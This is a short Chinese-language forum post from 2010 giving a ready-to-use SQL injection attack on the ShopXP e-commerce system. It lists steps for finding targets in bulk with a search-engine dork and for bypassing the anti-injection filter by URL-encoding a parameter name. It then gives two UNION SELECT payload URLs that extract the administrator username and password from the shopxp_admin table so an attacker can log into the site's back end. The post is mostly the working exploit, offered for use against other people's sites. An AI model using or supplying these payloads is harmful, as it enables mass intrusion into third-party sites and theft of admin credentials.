|
发表于 2010-1-20 16:28:16
|显示全部楼层
1.搜索漏洞关键词,寻找目标网站
2.打开页面TEXTBOX2.ASP?action=modify&newsid=ID号
3.查看是否存在注射,做了防注射
4.转码绕过防注射,进行联合查询
5.获取管理员账号密码登陆后台
批量关键词:
inurl:shopxp_news.asp
漏洞利用代码:
TEXTBOX2.ASP?action=modify&news%69d=122%20and%201=2%20union%20select%201,2,admin,4,5,6,7%20from%20shopxp_admin
TEXTBOX2.ASP?action=modify&news%69d=122%20and%201=2%20union%20select%201,2,password,4,5,6,7%20from%20shopxp_admin |
|